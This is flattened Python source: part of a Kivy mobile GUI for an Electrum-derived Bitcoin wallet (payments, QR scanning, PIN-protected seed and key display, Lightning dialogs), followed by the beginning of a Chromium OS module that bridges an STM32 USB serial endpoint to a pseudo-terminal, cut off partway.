Clock.create_trigger(self.update_status, .5) self._trigger_update_history = Clock.create_trigger(self.update_history, .5) self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5) self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5) # cached dialogs self._settings_dialog = None self._channels_dialog = None self._addresses_dialog = None self.set_fee_status() self.invoice_popup = None self.request_popup = None def on_pr(self, pr: 'PaymentRequest'): if not self.wallet: self.show_error(_('No wallet loaded.')) return if pr.verify(self.wallet.contacts): key = pr.get_id() invoice = self.wallet.get_invoice(key) # FIXME wrong key... if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID: self.show_error("invoice already paid") self.send_screen.do_clear() elif pr.has_expired(): self.show_error(_('Payment request has expired')) else: self.switch_to('send') self.send_screen.set_request(pr) else: self.show_error("invoice error:" + pr.error) self.send_screen.do_clear() def on_qr(self, data): from electrum_spero.bitcoin import is_address data = data.strip() if is_address(data): self.set_URI(data) return if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'): self.set_URI(data) return if data.lower().startswith('channel_backup:'): self.import_channel_backup(data) return bolt11_invoice = maybe_extract_bolt11_invoice(data) if bolt11_invoice is not None: self.set_ln_invoice(bolt11_invoice) return # try to decode transaction from electrum_spero.transaction import tx_from_any try: tx = tx_from_any(data) except: tx = None if tx: self.tx_dialog(tx) return # show error self.show_error("Unable to decode QR data") def update_tab(self, name): s = getattr(self, name + '_screen', None) if s: s.update() @profiler def update_tabs(self): for name in ['send', 'history', 'receive']: self.update_tab(name) def switch_to(self, name): s = getattr(self, name + '_screen', None) panel = self.tabs.ids.panel tab = self.tabs.ids[name + '_tab'] panel.switch_to(tab) def show_request(self, is_lightning, key): from .uix.dialogs.request_dialog import RequestDialog self.request_popup = RequestDialog('Request', key) self.request_popup.open() def show_invoice(self, is_lightning, key): from .uix.dialogs.invoice_dialog import InvoiceDialog invoice = self.wallet.get_invoice(key) if not invoice: return data = invoice.invoice if is_lightning else key self.invoice_popup = InvoiceDialog('Invoice', data, key) self.invoice_popup.open() def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None): from .uix.dialogs.qr_dialog import QRDialog def on_qr_failure(): popup.dismiss() msg = _('Failed to display QR code.') if text_for_clipboard: msg += '\n' + _('Text copied to clipboard.') self._clipboard.copy(text_for_clipboard) Clock.schedule_once(lambda dt: self.show_info(msg)) popup = QRDialog( title, data, show_text, failure_cb=on_qr_failure, text_for_clipboard=text_for_clipboard, help_text=help_text) popup.open() def scan_qr(self, on_complete): if platform != 'android': return self.scan_qr_non_android(on_complete) from jnius import autoclass, cast from android import activity PythonActivity = autoclass('org.kivy.android.PythonActivity') SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity") Intent = autoclass('android.content.Intent') intent = Intent(PythonActivity.mActivity, SimpleScannerActivity) def on_qr_result(requestCode, resultCode, intent): try: if resultCode == -1: # RESULT_OK: # this doesn't work due to some bug in jnius: # contents = intent.getStringExtra("text") String = autoclass("java.lang.String") contents = intent.getStringExtra(String("text")) on_complete(contents) except Exception as e: # exc would otherwise get lost send_exception_to_crash_reporter(e) finally: activity.unbind(on_activity_result=on_qr_result) activity.bind(on_activity_result=on_qr_result) PythonActivity.mActivity.startActivityForResult(intent, 0) def scan_qr_non_android(self, on_complete): from electrum_spero import qrscanner try: video_dev = self.electrum_config.get_video_device() data = qrscanner.scan_barcode(video_dev) on_complete(data) except UserFacingException as e: self.show_error(e) except BaseException as e: self.logger.exception('camera error') self.show_error(repr(e)) def do_share(self, data, title): if platform != 'android': return from jnius import autoclass, cast JS = autoclass('java.lang.String') Intent = autoclass('android.content.Intent') sendIntent = Intent() sendIntent.setAction(Intent.ACTION_SEND) sendIntent.setType("text/plain") sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data)) PythonActivity = autoclass('org.kivy.android.PythonActivity') currentActivity = cast('android.app.Activity', PythonActivity.mActivity) it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title))) currentActivity.startActivity(it) def build(self): return Builder.load_file(KIVY_GUI_PATH + '/main.kv') def _pause(self): if platform == 'android': # move activity to back from jnius import autoclass python_act = autoclass('org.kivy.android.PythonActivity') mActivity = python_act.mActivity mActivity.moveTaskToBack(True) def handle_crash_on_startup(func): def wrapper(self, *args, **kwargs): try: return func(self, *args, **kwargs) except Exception as e: self.logger.exception('crash on startup') from .uix.dialogs.crash_reporter import CrashReporter # show the crash reporter, and when it's closed, shutdown the app cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__) cr.on_dismiss = lambda: self.stop() Clock.schedule_once(lambda _, cr=cr: cr.open(), 0) return wrapper @handle_crash_on_startup def on_start(self): ''' This is the start point of the kivy ui ''' import time self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time())) Window.bind(size=self.on_size, on_keyboard=self.on_keyboard) #Window.softinput_mode = 'below_target' self.on_size(Window, Window.size) self.init_ui() crash_reporter.ExceptionHook(self) # init plugins run_hook('init_kivy', self) # fiat currency self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else '' # default tab self.switch_to('history') # bind intent for bitcoin: URI scheme if platform == 'android': from android import activity from jnius import autoclass PythonActivity = autoclass('org.kivy.android.PythonActivity') mactivity = PythonActivity.mActivity self.on_new_intent(mactivity.getIntent()) activity.bind(on_new_intent=self.on_new_intent) # connect callbacks if self.network: interests = ['wallet_updated', 'network_updated', 'blockchain_updated', 'status', 'new_transaction', 'verified'] util.register_callback(self.on_network_event, interests) util.register_callback(self.on_fee, ['fee']) util.register_callback(self.on_fee_histogram, ['fee_histogram']) util.register_callback(self.on_quotes, ['on_quotes']) util.register_callback(self.on_history, ['on_history']) util.register_callback(self.on_channels, ['channels_updated']) util.register_callback(self.on_channel, ['channel']) util.register_callback(self.on_invoice_status, ['invoice_status']) util.register_callback(self.on_request_status, ['request_status']) util.register_callback(self.on_payment_failed, ['payment_failed']) util.register_callback(self.on_payment_succeeded, ['payment_succeeded']) util.register_callback(self.on_channel_db, ['channel_db']) util.register_callback(self.set_num_peers, ['gossip_peers']) util.register_callback(self.set_unknown_channels, ['unknown_channels']) # load wallet self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True)) # URI passed in config uri = self.electrum_config.get('url') if uri: self.set_URI(uri) def on_channel_db(self, event, num_nodes, num_channels, num_policies): self.lightning_gossip_num_nodes = num_nodes self.lightning_gossip_num_channels = num_channels def set_num_peers(self, event, num_peers): self.lightning_gossip_num_peers = num_peers def set_unknown_channels(self, event, unknown): self.lightning_gossip_num_queries = unknown def get_wallet_path(self): if self.wallet: return self.wallet.storage.path else: return '' def on_wizard_success(self, storage, db, password): self.password = password if self.electrum_config.get('single_password'): self._use_single_password = update_password_for_directory(self.electrum_config, password, password) self.logger.info(f'use single password: {self._use_single_password}') wallet = Wallet(db, storage, config=self.electrum_config) wallet.start_network(self.daemon.network) self.daemon.add_wallet(wallet) self.load_wallet(wallet) def on_wizard_aborted(self): # wizard did not return a wallet; and there is no wallet open atm if not self.wallet: self.stop() def load_wallet_by_name(self, path): if not path: return if self.wallet and self.wallet.storage.path == path: return if self.password and self._use_single_password: storage = WalletStorage(path) # call check_password to decrypt storage.check_password(self.password) self.on_open_wallet(self.password, storage) return d = OpenWalletDialog(self, path, self.on_open_wallet) d.open() def on_open_wallet(self, password, storage): if not storage.file_exists(): wizard = InstallWizard(self.electrum_config, self.plugins) wizard.path = storage.path wizard.run('new') else: assert storage.is_past_initial_decryption() db = WalletDB(storage.read(), manual_upgrades=False) assert not db.requires_upgrade() self.on_wizard_success(storage, db, password) def on_stop(self): self.logger.info('on_stop') self.stop_wallet() def stop_wallet(self): if self.wallet: self.daemon.stop_wallet(self.wallet.storage.path) self.wallet = None def on_keyboard(self, instance, key, keycode, codepoint, modifiers): if key == 27 and self.is_exit is False: self.is_exit = True self.show_info(_('Press again to exit')) return True # override settings button if key in (319, 282): #f1/settings button on android #self.gui.main_gui.toggle_settings(self) return True def settings_dialog(self): from .uix.dialogs.settings import SettingsDialog if self._settings_dialog is None: self._settings_dialog = SettingsDialog(self) self._settings_dialog.update() self._settings_dialog.open() def lightning_open_channel_dialog(self): if not self.wallet.has_lightning(): self.show_error(_('Lightning is not enabled for this wallet')) return if not self.wallet.lnworker.channels and not self.wallet.lnworker.channel_backups: warning = _(messages.MSG_LIGHTNING_WARNING) d = Question(_('Do you want to create your first channel?') + '\n\n' + warning, self.open_channel_dialog_with_warning) d.open() else: d = LightningOpenChannelDialog(self) d.open() def swap_dialog(self): d = SwapDialog(self, self.electrum_config) d.open() def open_channel_dialog_with_warning(self, b): if b: d = LightningOpenChannelDialog(self) d.open() def lightning_channels_dialog(self): if self._channels_dialog is None: self._channels_dialog = LightningChannelsDialog(self) self._channels_dialog.open() def on_channel(self, evt, wallet, chan): if self._channels_dialog: Clock.schedule_once(lambda dt: self._channels_dialog.update()) def on_channels(self, evt, wallet): if self._channels_dialog: Clock.schedule_once(lambda dt: self._channels_dialog.update()) def is_wallet_creation_disabled(self): return bool(self.electrum_config.get('single_password')) and self.password is None def wallets_dialog(self): from .uix.dialogs.wallets import WalletDialog dirname = os.path.dirname(self.electrum_config.get_wallet_path()) d = WalletDialog(dirname, self.load_wallet_by_name, self.is_wallet_creation_disabled()) d.open() def popup_dialog(self, name): if name == 'settings': self.settings_dialog() elif name == 'wallets': self.wallets_dialog() elif name == 'status': popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv') master_public_keys_layout = popup.ids.master_public_keys for xpub in self.wallet.get_master_public_keys()[1:]: master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key'))) ref = RefLabel() ref.name = _('Master Public Key') ref.data = xpub master_public_keys_layout.add_widget(ref) popup.open() elif name == 'lightning_channels_dialog' and not self.wallet.can_have_lightning(): self.show_error(_("Not available for this wallet.") + "\n\n" + _("Lightning is currently restricted to HD wallets with p2wpkh addresses.")) elif name.endswith("_dialog"): getattr(self, name)() else: popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv') popup.open() @profiler def init_ui(self): ''' Initialize The Ux part of electrum. This function performs the basic tasks of setting up the ui. ''' #from weakref import ref self.funds_error = False # setup UX self.screens = {} #setup lazy imports for mainscreen Factory.register('AnimatedPopup', module='electrum_spero.gui.kivy.uix.dialogs') Factory.register('QRCodeWidget', module='electrum_spero.gui.kivy.uix.qrcodewidget') # preload widgets. Remove this if you want to load the widgets on demand #Cache.append('electrum_spero_widgets', 'AnimatedPopup', Factory.AnimatedPopup()) #Cache.append('electrum_spero_widgets', 'QRCodeWidget', Factory.QRCodeWidget()) # load and focus the ui self.root.manager = self.root.ids['manager'] self.history_screen = None self.send_screen = None self.receive_screen = None self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum-spero.png" self.tabs = self.root.ids['tabs'] def update_interfaces(self, dt): net_params = self.network.get_parameters() self.num_nodes = len(self.network.get_interfaces()) self.num_chains = len(self.network.get_blockchains()) chain = self.network.blockchain() self.blockchain_forkpoint = chain.get_max_forkpoint() self.blockchain_name = chain.get_name() interface = self.network.interface if interface: self.server_host = interface.host else: self.server_host = str(net_params.server.host) + ' (connecting...)' self.proxy_config = net_params.proxy or {} self.update_proxy_str(self.proxy_config) def on_network_event(self, event, *args): self.logger.info('network event: '+ event) if event == 'network_updated': self._trigger_update_interfaces() self._trigger_update_status() elif event == 'wallet_updated': self._trigger_update_wallet() self._trigger_update_status() elif event == 'blockchain_updated': # to update number of confirmations in history self._trigger_update_wallet() elif event == 'status': self._trigger_update_status() elif event == 'new_transaction': self._trigger_update_wallet() elif event == 'verified': self._trigger_update_wallet() @profiler def load_wallet(self, wallet: 'Abstract_Wallet'): if self.wallet: self.stop_wallet() self.wallet = wallet self.wallet_name = wallet.basename() self.update_wallet() # Once GUI has been initialized check if we want to announce something # since the callback has been called before the GUI was initialized if self.receive_screen: self.receive_screen.clear() self.update_tabs() run_hook('load_wallet', wallet, self) try: wallet.try_detecting_internal_addresses_corruption() except InternalAddressCorruption as e: self.show_error(str(e)) send_exception_to_crash_reporter(e) return self.use_change = self.wallet.use_change self.electrum_config.save_last_wallet(wallet) self.request_focus_for_main_view() def request_focus_for_main_view(self): if platform != 'android': return # The main view of the activity might be not have focus # in which case e.g. the OS "back" button would not work. # see #6276 (specifically "method 2" and "method 3") from jnius import autoclass PythonActivity = autoclass('org.kivy.android.PythonActivity') PythonActivity.requestFocusForMainView() def update_status(self, *dt): if not self.wallet: return if self.network is None or not self.network.is_connected(): status = _("Offline") elif self.network.is_connected(): self.num_blocks = self.network.get_local_height() server_height = self.network.get_server_height() server_lag = self.num_blocks - server_height if not self.wallet.up_to_date or server_height == 0: num_sent, num_answered = self.wallet.get_history_sync_state_details() status = ("{} [size=18dp]({}/{})[/size]" .format(_("Synchronizing..."), num_answered, num_sent)) elif server_lag > 1: status = _("Server is lagging ({} blocks)").format(server_lag) else: status = '' else: status = _("Disconnected") if status: self.balance = status self.fiat_balance = status else: c, u, x = self.wallet.get_balance() l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0 balance_sat = c + u + x + l text = self.format_amount(balance_sat) self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy def update_wallet_synchronizing_progress(self, *dt): if not self.wallet: return if not self.wallet.up_to_date: self._trigger_update_status() def get_max_amount(self): from electrum_spero.transaction import PartialTxOutput if run_hook('abort_send', self): return '' inputs = self.wallet.get_spendable_coins(None) if not inputs: return '' addr = None if self.send_screen: addr = str(self.send_screen.address) if not addr: addr = self.wallet.dummy_address() outputs = [PartialTxOutput.from_address_and_value(addr, '!')] try: tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs) except NoDynamicFeeEstimates as e: Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e))) return '' except NotEnoughFunds: return '' except InternalAddressCorruption as e: self.show_error(str(e)) send_exception_to_crash_reporter(e) return '' amount = tx.output_value() __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0) amount_after_all_fees = amount - x_fee_amount return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point()) def format_amount(self, x, is_diff=False, whitespaces=False): return format_satoshis( x, num_zeros=0, decimal_point=self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces, ) def format_amount_and_units(self, x) -> str: if x is None: return 'none' if x == '!': return 'max' return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit def format_fee_rate(self, fee_rate): # fee_rate is in sat/kB return format_fee_satoshis(fee_rate/1000) + ' spr/byte' #@profiler def update_wallet(self, *dt): self._trigger_update_status() if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()): self.update_tabs() def notify(self, message): try: global notification, os if not notification: from plyer import notification icon = (os.path.dirname(os.path.realpath(__file__)) + '/../../' + self.icon) notification.notify('electrum-spero', message, app_icon=icon, app_name='electrum-spero') except ImportError: self.logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`') def on_pause(self): self.pause_time = time.time() # pause nfc if self.nfcscanner: self.nfcscanner.nfc_disable() return True def on_resume(self): if self.nfcscanner: self.nfcscanner.nfc_enable() if self.resume_dialog is not None: return now = time.time() if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60: def on_success(x): self.resume_dialog = None d = PincodeDialog( self, check_password=self.check_pin_code, on_success=on_success, on_failure=self.stop) self.resume_dialog = d d.open() def on_size(self, instance, value): width, height = value self._orientation = 'landscape' if width > height else 'portrait' self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone' def on_ref_label(self, label, *, show_text_with_qr: bool = True): if not label.data: return self.qr_dialog(label.name, label.data, show_text_with_qr) def show_error(self, error, width='200dp', pos=None, arrow_pos=None, exit=False, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/error', duration=0, modal=False): ''' Show an error Message Bubble. ''' self.show_info_bubble(text=error, icon=icon, width=width, pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit, duration=duration, modal=modal) def show_info(self, error, width='200dp', pos=None, arrow_pos=None, exit=False, duration=0, modal=False): ''' Show an Info Message Bubble. ''' self.show_error(error, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/important', duration=duration, modal=modal, exit=exit, pos=pos, arrow_pos=arrow_pos) def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0, arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False): '''Method to show an Information Bubble .. parameters:: text: Message to be displayed pos: position for the bubble duration: duration the bubble remains on screen. 0 = click to hide width: width of the Bubble arrow_pos: arrow position for the bubble ''' text = str(text) # so that we also handle e.g. Exception info_bubble = self.info_bubble if not info_bubble: info_bubble = self.info_bubble = Factory.InfoBubble() win = Window if info_bubble.parent: win.remove_widget(info_bubble if not info_bubble.modal else info_bubble._modal_view) if not arrow_pos: info_bubble.show_arrow = False else: info_bubble.show_arrow = True info_bubble.arrow_pos = arrow_pos img = info_bubble.ids.img if text == 'texture': # icon holds a texture not a source image # display the texture in full screen text = '' img.texture = icon info_bubble.fs = True info_bubble.show_arrow = False img.allow_stretch = True info_bubble.dim_background = True info_bubble.background_image = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/card' else: info_bubble.fs = False info_bubble.icon = icon #if img.texture and img._coreimage: # img.reload() img.allow_stretch = False info_bubble.dim_background = False info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble' info_bubble.message = text if not pos: pos = (win.center[0], win.center[1] - (info_bubble.height/2)) info_bubble.show(pos, duration, width, modal=modal, exit=exit) def tx_dialog(self, tx): from .uix.dialogs.tx_dialog import TxDialog d = TxDialog(self, tx) d.open() def show_transaction(self, txid): tx = self.wallet.db.get_transaction(txid) if not tx and self.wallet.lnworker: tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid) if tx: self.tx_dialog(tx) else: self.show_error(f'Transaction not found {txid}') def lightning_tx_dialog(self, tx): from .uix.dialogs.lightning_tx_dialog import LightningTxDialog d = LightningTxDialog(self, tx) d.open() def sign_tx(self, *args): threading.Thread(target=self._sign_tx, args=args).start() def _sign_tx(self, tx, password, on_success, on_failure): try: self.wallet.sign_transaction(tx, password) except InvalidPassword: Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN"))) return on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success Clock.schedule_once(lambda dt: on_success(tx)) def _broadcast_thread(self, tx, on_complete): status = False try: self.network.run_from_another_thread(self.network.broadcast_transaction(tx)) except TxBroadcastError as e: msg = e.get_message_for_gui() except BestEffortRequestFailed as e: msg = repr(e) else: status, msg = True, tx.txid() Clock.schedule_once(lambda dt: on_complete(status, msg)) def broadcast(self, tx): def on_complete(ok, msg): if ok: self.show_info(_('Payment sent.')) if self.send_screen: self.send_screen.do_clear() else: msg = msg or '' self.show_error(msg) if self.network and self.network.is_connected(): self.show_info(_('Sending')) threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start() else: self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected')) def description_dialog(self, screen): from .uix.dialogs.label_dialog import LabelDialog text = screen.message def callback(text): screen.message = text d = LabelDialog(_('Enter description'), text, callback) d.open() def amount_dialog(self, screen, show_max): from .uix.dialogs.amount_dialog import AmountDialog amount = screen.amount if amount: amount, u = str(amount).split() assert u == self.base_unit def cb(amount): if amount == '!': screen.is_max = True max_amt = self.get_max_amount() screen.amount = (max_amt + ' ' + self.base_unit) if max_amt else '' else: screen.amount = amount screen.is_max = False popup = AmountDialog(show_max, amount, cb) popup.open() def addresses_dialog(self): from .uix.dialogs.addresses import AddressesDialog if self._addresses_dialog is None: self._addresses_dialog = AddressesDialog(self) self._addresses_dialog.update() self._addresses_dialog.open() def fee_dialog(self): from .uix.dialogs.fee_dialog import FeeDialog fee_dialog = FeeDialog(self, self.electrum_config, self.set_fee_status) fee_dialog.open() def set_fee_status(self): target, tooltip, dyn = self.electrum_config.get_fee_target() self.fee_status = target def on_fee(self, event, *arg): self.set_fee_status() def protected(self, msg, f, args): if self.electrum_config.get('pin_code'): msg += "\n" + _("Enter your PIN code to proceed") on_success = lambda pw: f(*args, self.password) d = PincodeDialog( self, message = msg, check_password=self.check_pin_code, on_success=on_success, on_failure=lambda: None) d.open() else: d = Question( msg, lambda b: f(*args, self.password) if b else None, yes_str=_("OK"), no_str=_("Cancel"), title=_("Confirm action")) d.open() def delete_wallet(self): basename = os.path.basename(self.wallet.storage.path) d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet) d.open() def _delete_wallet(self, b): if b: basename = self.wallet.basename() self.protected(_("Are you sure you want to delete wallet {}?").format(basename), self.__delete_wallet, ()) def __delete_wallet(self, pw): wallet_path = self.get_wallet_path() basename = os.path.basename(wallet_path) if self.wallet.has_password(): try: self.wallet.check_password(pw) except InvalidPassword: self.show_error("Invalid password") return self.stop_wallet() os.unlink(wallet_path) self.show_error(_("Wallet removed: {}").format(basename)) new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True) self.load_wallet_by_name(new_path) def show_seed(self, label): self.protected(_("Display your seed?"), self._show_seed, (label,)) def _show_seed(self, label, password): if self.wallet.has_password() and password is None: return keystore = self.wallet.keystore seed = keystore.get_seed(password) passphrase = keystore.get_passphrase(password) label.data = seed if passphrase: label.data += '\n\n' + _('Passphrase') + ': ' + passphrase def has_pin_code(self): return bool(self.electrum_config.get('pin_code')) def check_pin_code(self, pin): if pin != self.electrum_config.get('pin_code'): raise InvalidPassword def change_password(self, cb): def on_success(old_password, new_password): # called if old_password works on self.wallet self.password = new_password if self._use_single_password: path = self.wallet.storage.path self.stop_wallet() update_password_for_directory(self.electrum_config, old_password, new_password) self.load_wallet_by_name(path) msg = _("Password updated successfully") else: self.wallet.update_password(old_password, new_password) msg = _("Password updated for {}").format(os.path.basename(self.wallet.storage.path)) self.show_info(msg) on_failure = lambda: self.show_error(_("Password not updated")) d = ChangePasswordDialog(self, self.wallet, on_success, on_failure) d.open() def pin_code_dialog(self, cb): if self._use_single_password and self.has_pin_code(): def on_choice(choice): if choice == 0: self.change_pin_code(cb) else: self.reset_pin_code(cb) choices = {0:'Change PIN code', 1:'Reset PIN'} dialog = ChoiceDialog( _('PIN Code'), choices, 0, on_choice, keep_choice_order=True) dialog.open() else: self.change_pin_code(cb) def reset_pin_code(self, cb): on_success = lambda x: self._set_new_pin_code(None, cb) d = PasswordDialog(self, basename = self.wallet.basename(), check_password = self.wallet.check_password, on_success=on_success, on_failure=lambda: None, is_change=False, has_password=self.wallet.has_password()) d.open() def _set_new_pin_code(self, new_pin, cb): self.electrum_config.set_key('pin_code', new_pin) cb() self.show_info(_("PIN updated") if new_pin else _('PIN disabled')) def change_pin_code(self, cb): on_failure = lambda: self.show_error(_("PIN not updated")) on_success = lambda old_pin, new_pin: self._set_new_pin_code(new_pin, cb) d = PincodeDialog( self, check_password=self.check_pin_code, on_success=on_success, on_failure=on_failure, is_change=True, has_password = self.has_pin_code()) d.open() def save_backup(self): if platform != 'android': backup_dir = self.electrum_config.get_backup_dir() if backup_dir: self._save_backup(backup_dir) else: self.show_error(_("Backup NOT saved. Backup directory not configured.")) return from android.permissions import request_permissions, Permission def cb(permissions, grant_results: Sequence[bool]): if not grant_results or not grant_results[0]: self.show_error(_("Cannot save backup without STORAGE permission")) return # note: Clock.schedule_once is a hack so that we get called on a non-daemon thread # (needed for WalletDB.write) backup_dir = util.android_backup_dir() Clock.schedule_once(lambda dt: self._save_backup(backup_dir)) request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb) def _save_backup(self, backup_dir): try: new_path = self.wallet.save_backup(backup_dir) except Exception as e: self.logger.exception("Failed to save wallet backup") self.show_error("Failed to save wallet backup" + '\n' + str(e)) return self.show_info(_("Backup saved:") + f"\n{new_path}") def export_private_keys(self, pk_label, addr): if self.wallet.is_watching_only(): self.show_info(_('This is a watching-only wallet. It does not contain private keys.')) return def show_private_key(addr, pk_label, password): if self.wallet.has_password() and password is None: return if not self.wallet.can_export(): return try: key = str(self.wallet.export_private_key(addr, password)) pk_label.data = key except InvalidPassword: self.show_error("Invalid PIN") return self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label)) def import_channel_backup(self, encrypted): d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted)) d.open() def _import_channel_backup(self, b, encrypted): if not b: return try: self.wallet.lnworker.import_channel_backup(encrypted) except Exception as e: self.logger.exception("failed to import backup") self.show_error("failed to import backup" + '\n' + str(e)) return self.lightning_channels_dialog() def lightning_status(self): if self.wallet.has_lightning(): if self.wallet.lnworker.has_deterministic_node_id(): status = _('Enabled') else: status = _('Enabled, non-recoverable channels') else: if self.wallet.can_have_lightning(): status = _('Not enabled') else: status = _("Not available for this wallet.") return status def on_lightning_status(self, root): if self.wallet.has_lightning(): if self.wallet.lnworker.has_deterministic_node_id(): pass else: if self.wallet.db.get('seed_type') == 'segwit': msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. " "This means that you must save a backup of your wallet everytime you create a new channel.\n\n" "If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed") else: msg = _("Your channels cannot be recovered from seed. " "This means that you must save a backup of your wallet everytime you create a new channel.\n\n" "If you want to have recoverable channels, you must create a new wallet with an Electrum seed") self.show_info(msg) elif self.wallet.can_have_lightning(): root.dismiss() if self.wallet.can_have_deterministic_lightning(): msg = _( "Lightning is not enabled because this wallet was created with an old version of Electrum. " "Create lightning keys?") else: msg = _( "Warning: this wallet type does not support channel recovery from seed. " "You will need to backup your wallet everytime you create a new wallet. " "Create lightning keys?") d = Question(msg, self._enable_lightning, title=_('Enable Lightning?')) d.open() def _enable_lightning(self, b): if not b: return self.wallet.init_lightning(password=self.password) self.show_info(_('Lightning keys have been initialized.'))
stm32uart.py
# Copyright 2016 The Chromium OS Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Allow creation of uart/console interface via stm32 usb endpoint.""" import errno import exceptions import logging import os import select import sys import termios import threading import time import tty import common as c import stm32usb import uart import usb class SuartError(c.InterfaceError): """Class for exceptions of Suart.""" def __init__(self, msg, value=0): """SuartError constructor. Args: msg: string, message describing error in detail value: integer, value of error when non-zero status returned. Default=0 """ super(SuartError, self).__init__(msg, value) self.msg = msg self.value = value class Suart(uart.Uart): """Provide interface to stm32 serial usb endpoint.""" USB_USART_SET_PARITY = 1 USB_USART_SET_BAUD = 3 USB_USART_BAUD_MULTIPLIER = 100 def __init__(self, vendor=0x18d1, product=0x501a, interface=0, serialname=None, ftdi_context=None): """Suart contstructor. Initializes stm32 USB stream interface. Args: vendor: usb vendor id of stm32 device product: usb product id of stm32 device interface: interface number of stm32 device to use serialname: n/a. Defaults to None. ftdi_context: n/a. Defaults to None. Raises: SuartError: If init fails """ super(Suart, self).__init__() self._logger = logging.getLogger('Suart') self._logger.debug('') self._logger.debug('Suart opening %04x:%04x, intf %d, sn: %s' % (vendor, product, interface, serialname)) self._props = {} self._done = threading.Event() self._susb = stm32usb.Susb(vendor=vendor, product=product, interface=interface, serialname=serialname, logger=self._logger) self._logger.debug('Set up stm32 uart') @staticmethod def Build(vid, pid, sid, interface_data, **kwargs): """Factory method to implement the interface.""" c.build_logger.info('Suart: interface: %s' % interface_data) sobj = Suart(vendor=vid, product=pid, interface=interface_data['interface'], serialname=sid) sobj.run() c.build_logger.info('%s' % sobj.get_pty()) return sobj @staticmethod def name(): """Name to request interface by in interface config maps.""" return 'stm32_uart' def close(self): """Suart wind down logic.""" self._done.set() for t in [self._rx_thread, self._tx_thread]: t.join(timeout=0.2) del self._susb def reinitialize(self): """Reinitialize the usb endpoint""" self._susb.reset_usb() def get_device_info(self): """The usb device information.""" return self._susb.get_device_info() def run_rx_thread(self): self._logger.debug('rx thread started on %s' % self.get_pty()) ep = select.epoll() ep.register(self._ptym, select.EPOLLHUP) while not self._done.is_set(): events = ep.poll(0) # Check if the pty is connected to anything, or hungup. if not events: try: r = self._susb.read_ep(256, self._susb.TIMEOUT_MS) if r: os.write(self._ptym, r) except Exception as e: # If we miss some characters on pty disconnect, that's fine. # ep.read() also throws USBError on timeout, which we discard. if type(e) not in [exceptions.OSError, usb.core.USBError]: self._logger.debug('rx %s: %s' % (self.get_pty(), e)) else: self._done.wait(.1) def run_tx_thread(self): self._logger.debug('tx thread started on %s' % self.get_pty()) ep = select.epoll() readp = select.epoll() ep.register(self._ptym, select.EPOLLHUP) readp.register(self._ptym, select.EPOLLIN) while not self._done.is_set(): events = ep.poll(0) # Check if the pty is connected to anything, or hungup. if not events: try: if readp.poll(.1): r = os.read(self._ptym, 64) # TODO(crosbug.com/936182): Remove when the servo v4/micro console # issues are fixed. time.sleep(0.001) if r: self._susb.write_ep(r, self._susb.TIMEOUT_MS) except IOError as e: self._logger.debug('tx %s: %s' % (self.get_pty(), e)) if e.errno == errno.ENODEV: self._logger.error('USB disconnected 0x%04x:%04x, servod failed.', self._susb._vendor, self._susb._product) raise except Exception as e: self._logger.debug('tx %s: %s' % (self.get_pty(), e)) else: self._done.wait(.1) def run(self): """Creates pthreads to poll stm32 & PTY for data. """ self._logger.debug('') m, s = os.openpty() self._ptyname = os.ttyname(s) self._logger.debug('PTY name: %s' % self._ptyname) self._ptym = m self._ptys = s os.fchmod(s, 0o660) # Change the owner and group of the PTY to the user who started servod. try: uid = int(os.environ.get('SUDO_UID', -1)) except TypeError: uid = -1 try: gid = int(os.environ.get('SUDO_GID', -1)) except TypeError: gid = -1 os.fchown(s, uid, gid) tty.setraw(self._ptym, termios.TCSADRAIN) # Generate a HUP flag on pty 